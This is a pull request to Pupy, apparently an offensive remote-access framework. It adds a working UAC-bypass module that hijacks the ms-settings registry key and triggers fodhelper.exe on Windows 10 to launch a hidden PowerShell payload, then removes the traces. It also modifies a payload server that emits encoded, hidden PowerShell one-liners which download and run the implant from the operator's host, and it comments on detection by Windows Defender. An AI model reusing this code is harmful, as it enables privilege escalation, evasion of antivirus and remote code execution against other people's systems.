### PR TITLE
fodhelper method for BypassUAC on Wind10. Improvements.

### DIFF
--- a/pupy/modules/bypassuac.py
+++ b/pupy/modules/bypassuac.py
@@ -17,7 +17,7 @@ class BypassUAC(PupyModule):
 
     def init_argparse(self):
         self.arg_parser = PupyArgumentParser(prog="bypassuac", description=self.__doc__)
-        self.arg_parser.add_argument('-m', dest='method', choices=["appPaths","eventvwr", "dll_hijacking"], default=None, help="By default, the method will be choosen for you: 'eventvwr' for wind7-8.1 and 'appPaths' for wind10. dll_hijacking method can be used for Windows 7/2008 and Windows 8/2012")
+        self.arg_parser.add_argument('-m', dest='method', choices=["fodhelper","eventvwr", "dll_hijacking"], default=None, help="By default, the method will be choosen for you: 'eventvwr' for wind7-8.1 and 'fodhelper' for wind10. 'fodhelper' can be used on Wind10 only. 'dll_hijacking' method is deprecated (Windows 7/2008 and Windows 8/2012)")
 
     def run(self, args):
         # check if a UAC Bypass can be done
@@ -25,7 +25,7 @@ class BypassUAC(PupyModule):
             self.error('Your are not on the local administrator group.')
             return
 
-        appPathsMethod = False
+        fodhelperMethod = False
         eventvwrMethod = False
         dllhijackingMethod = False
 
@@ -33,23 +33,27 @@ class BypassUAC(PupyModule):
         # choose methods depending on the OS Version
         if not args.method:
             if self.client.desc['release'] == '10':
-                appPathsMethod = True
+                fodhelperMethod = True
             else:
                 dllhijackingMethod = True
-        elif args.method == "appPaths":
-            appPathsMethod = True
+        elif args.method == "fodhelper":
+            fodhelperMethod = True
         elif args.method == "eventvwr":
             eventvwrMethod = True
         elif args.method == "dll_hijacking":
             dllhijackingMethod = True
 
-        if appPathsMethod:
-            self.success("Trying to bypass UAC using the 'app paths'+'sdclt.exe' method, wind10 targets ONLY...")
-            bypassUasModule.bypassuac_through_appPaths()
+        if fodhelperMethod:
+            self.success("Trying to bypass UAC using the 'fodhelper' method, wind10 targets ONLY...")
+            bypassUasModule.bypassuac_through_fodhelper()
         if eventvwrMethod:
-            self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
+            #It is still working on Wind7 (tested 2017/09/14)
+            self.warning("DEPRECATED method for wind10. Tested 2017/09/14")
+            self.warning("Detected by Windows Defender on Wind10 (tested 2017/09/14)")
+            self.success("Trying to bypass UAC using the Eventvwr method, wind7-8.1 targets...")
             bypassUasModule.bypassuac_through_eventVwrBypass()
         if dllhijackingMethod:
-            # Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
+            #Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
+            self.warning("DEPRECATED method. i.e. It doesn't work anymore on Wind7 (tested 2017/09/14)")
             self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
             bypassUasModule.bypassuac_through_powerSploitBypassUAC()

--- a/pupy/modules/lib/windows/bypassuac.py
+++ b/pupy/modules/lib/windows/bypassuac.py
@@ -39,6 +39,26 @@ class bypassuac():
         self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
         self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
 
+    def bypassuac_through_fodhelper(self):
+        '''
+        Performs an UAC bypass attack by using fodhepler.exe (wind10 only): Thanks to https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1
+        '''
+        self.module.info("Running 'fodhelper' method for bypassing UAC...")
+        if '64' in self.module.client.desc['os_arch']:
+            force_x86_dll = False
+        else:
+            force_x86_dll = True
+        self.module.info('Uploading temporary files')
+        self.uploadPupyDLL(force_x86_dll=force_x86_dll)
+        self.uploadPowershellScripts()
+        files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
+        self.module.info('Altering the registry')
+        self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking_fodhelper(self.mainPowershellScriptRemotePath, files_to_delete)
+
+        self.module.success("Waiting for a connection from the DLL (take few seconds, 1 min max)...")
+        self.module.success("If nothing happened, try to migrate to another process and try again.")
+
+    """
     def bypassuac_through_appPaths(self):
         '''
         Performs an UAC bypass attack by using app Paths + sdclt.exe (Wind10 Only): Thanks to enigma0x3 (https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/).
@@ -57,7 +77,7 @@ class bypassuac():
 
         self.module.success("Waiting for a connection from the DLL (take few seconds, 1 min max)...")
         self.module.success("If nothing happened, try to migrate to another process and try again.")
-
+    """
 
     def bypassuac_through_eventVwrBypass(self):
         #   '''
@@ -177,3 +197,4 @@ class bypassuac():
 
         logging.info("Uploading pupy dll {0} to {1}".format(self.pupyDLLLocalPath, self.pupyDLLRemotePath))
         upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath)
+        

--- a/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py
+++ b/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py
@@ -53,6 +53,7 @@ def registry_hijacking_eventvwr(mainPowershellScriptRemotePath, files_to_delete)
     DeleteKey(HKCU, mscCmdPath)
     deleteTHisRemoteFile(files_to_delete)
 
+"""
 def registry_hijacking_appPath(mainPowershellScriptRemotePath, files_to_delete):
     '''
     '''
@@ -94,5 +95,51 @@ def registry_hijacking_appPath(mainPowershellScriptRemotePath, files_to_delete):
 
     #Clean everything
     DeleteKey(HKCU, appPathsPath)
+    deleteTHisRemoteFile(files_to_delete)
+    deleteTHisRemoteFile([cmdPath])
+"""
+
+def registry_hijacking_fodhelper(mainPowershellScriptRemotePath, files_to_delete):
+    '''
+    '''
+    tmp, sysRoot = get_env_variables()
+    HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
+    fodhelperPath = "Software\Classes\ms-settings\Shell\Open\command"
+    powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % sysRoot
+    cmd = "{0} -w hidden -noni -nop  -ExecutionPolicy Bypass -File {1}".format(powershellPath, mainPowershellScriptRemotePath)
+    cmdPath = "{0}\\temp.bat".format(tmp)
+
+    try:
+        # The registry key already exist in HKCU, altering...
+        key = OpenKey(HKCU, fodhelperPath, KEY_SET_VALUE)
+    except:
+        # Adding the registry key in HKCU
+        key = CreateKey(HKCU, fodhelperPath)
+
+    registry_key = OpenKey(HKCU, fodhelperPath, 0, KEY_WRITE)
+    SetValueEx(registry_key, 'DelegateExecute', 0, REG_SZ, "")
+    SetValueEx(registry_key, '', 0, REG_SZ, cmdPath)
+    CloseKey(registry_key)
+
+    #Creates cmd file
+    f=open(cmdPath, "w")
+    f.write(cmd)
+    f.close()
+
+    # Creation fodhelper.exe path
+    triggerPath = os.path.join(os.environ['WINDIR'],'System32','fodhelper.exe')
+    #Disables file system redirection for the calling thread (File system redirection is enabled by default)
+    wow64 = ctypes.c_long(0)
+    ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(ctypes.byref(wow64))
+    # Executing fodhelper.exe
+    output = subprocess.check_output(triggerPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
+    #Enable file system redirection for the calling thread
+    ctypes.windll.kernel32.Wow64EnableWow64FsRedirection(wow64)
+
+    # Sleeping 5 secds...
+    time.sleep(5)
+
+    #Clean everything
+    DeleteKey(HKCU, fodhelperPath)
     deleteTHisRemoteFile(files_to_delete)
     deleteTHisRemoteFile([cmdPath])

--- a/pupy/pupygen.py
+++ b/pupy/pupygen.py
@@ -423,7 +423,8 @@ def get_parser(base_parser, config):
                             action='store_true', help="In case of autodetection prefer external IP")
     parser.add_argument('--no-use-proxy', action='store_true', help="Don't use the target's proxy configuration even if it is used by target (for ps1_oneliner only for now)")
     parser.add_argument('--randomize-hash', action='store_true', help="add a random string in the exe to make it's hash unknown")
-    parser.add_argument('--oneliner-listen-port', default=8080, type=int, help="Port used by oneliner listeners ps1,py (default: %(default)s)")
+    parser.add_argument('--oneliner-listen-port', default=8080, type=int, help="Port used by ps1_oneliner locally (default: %(default)s)")
+    parser.add_argument('--oneliner-no-ssl', default=False, action='store_true', help="No ssl for ps1_oneliner stages (default: %(default)s)")
     parser.add_argument('--debug-scriptlets', action='store_true', help="don't catch scriptlets exceptions on the client for debug purposes")
     parser.add_argument('--debug', action='store_true', help="build with the debug template (the payload open a console)")
     parser.add_argument('--workdir', help='Set Workdir (Default = current workdir)')
@@ -618,10 +619,11 @@ def pupygen(args, config):
     elif args.format=="ps1_oneliner":
         from pupylib.payloads.ps1_oneliner import serve_ps1_payload
         link_ip=conf["launcher_args"][conf["launcher_args"].index("--host")+1].split(":",1)[0]
-        if args.no_use_proxy == True:
-            serve_ps1_payload(conf, link_ip=link_ip, port=args.oneliner_listen_port, useTargetProxy=False)
-        else:
-            serve_ps1_payload(conf, link_ip=link_ip, port=args.oneliner_listen_port, useTargetProxy=True)
+        if args.oneliner_no_ssl == False : sslEnabled = True
+        else: sslEnabled = False
+        if args.no_use_proxy == False : useTargetProxy = True
+        else: useTargetProxy = False
+        serve_ps1_payload(conf, link_ip=link_ip, port=args.oneliner_listen_port, useTargetProxy=useTargetProxy, sslEnabled=sslEnabled)
     elif args.format=="rubber_ducky":
         rubber_ducky(conf).generateAllForOStarget()
     else:

--- a/pupy/pupylib/payloads/ps1_oneliner.py
+++ b/pupy/pupylib/payloads/ps1_oneliner.py
@@ -162,11 +162,11 @@ class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
             pass
         self.socket.close()
 
-def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=True, useTargetProxy=True):
+def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", useTargetProxy=False, sslEnabled=True):
     try:
         try:
             server = ThreadedHTTPServer((ip, port),PupyPayloadHTTPHandler)
-            server.set(conf, link_ip, port, ssl, useTargetProxy)
+            server.set(conf, link_ip, port, sslEnabled, useTargetProxy)
         except Exception as e:
             # [Errno 98] Adress already in use
             raise
@@ -174,7 +174,7 @@ def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=Tr
         print colorize("[+] ","green")+"copy/paste one of these one-line loader to deploy pupy without writing on the disk :"
         print " --- "
         if useTargetProxy == True:
-            if not ssl:
+            if not sslEnabled:
                 a="iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')"%(link_ip, port, url_random_one)
                 b=b64encode(a.encode('UTF-16LE'))
             else:
@@ -183,7 +183,7 @@ def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=Tr
             oneliner=colorize("powershell.exe -w hidden -noni -nop -enc %s"%b, "green")
             message=colorize("Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy", "yellow")
         else:
-            if not ssl:
+            if not sslEnabled:
                 a="$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')"%(link_ip, port, url_random_one)
                 b=b64encode(a.encode('UTF-16LE'))
             else:


### PR DESCRIPTION
- fodhelper method ([https://github.com/winscripting/UAC-bypass](https://github.com/winscripting/UAC-bypass)) implemented for bypassing UAC on Windows 10.
- appPath method (for bypassing UAC too) removed.
- ps1_onliner can be used without ssl (for stages).
- Bug fix in ps1_oneliner with ssl. On kali, https server allows tls1.2 only. Consequently, powershell oneliner can't established a connection to http server. By default, https servers is configured to tls1.0 now.